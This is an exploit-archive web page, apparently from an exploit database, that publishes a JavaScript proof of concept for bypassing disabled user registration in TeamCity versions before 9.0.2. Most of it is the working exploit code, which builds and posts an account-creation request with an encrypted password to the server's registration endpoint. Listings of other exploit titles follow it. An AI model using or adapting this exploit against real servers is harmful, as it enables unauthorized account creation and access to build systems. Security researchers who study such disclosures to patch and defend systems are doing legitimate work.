Menu

Search for hundreds of thousands of exploits

"TeamCity < 9.0.2 - Disabled Registration Bypass"

Author

Exploit author

allyshka

Platform

Exploit platform

multiple

Release date

Exploit published date

2018-03-28

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
var login = 'testuser'; //логин пользователя
var password = 'SuperMEgaPa$$'; //пароль
var email = 'testusername654@mailinater.com'; // email
/* Code */
var b = BS.LoginForm;
var public_key = $F("publicKey");
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
var c = OO.extend(BS.ErrorsAwareListener, {
            onDuplicateAccountError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onMaxNumberOfUserAccountsReachedError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onCreateUserError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onCompleteSave: function(c, d, b) {
                BS.ErrorsAwareListener.onCompleteSave(c, d, b);
                if (!b) {
                    BS.XMLResponse.processRedirect(d);
                }
            }
        });
BS.ajaxRequest("registerUserSubmit.html", {
                method: "post",
                parameters: parameters,
                onComplete: function(i) {
                    if (!i.responseXML) {
                        alert(i.responseText);
                    } else {
                        var h = i.responseXML;
                        var e = BS.XMLResponse.processErrors(h, c);
                        console.log(i.responseText);
                        c.onCompleteSave(b, h, e, i.responseText);
                    }
                },
                onFailure: function(i) {
                    console.log(i);
                },
                onException: function(i, h) {
                    console.log(i);
                }
            });
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2019-10-25 "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)" remote multiple allyshka
2019-03-01 "WordPress Core 5.0 - Remote Code Execution" webapps php allyshka
2018-12-12 "phpBB 3.2.3 - Remote Code Execution" webapps php allyshka
2018-03-28 "TeamCity < 9.0.2 - Disabled Registration Bypass" remote multiple allyshka 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected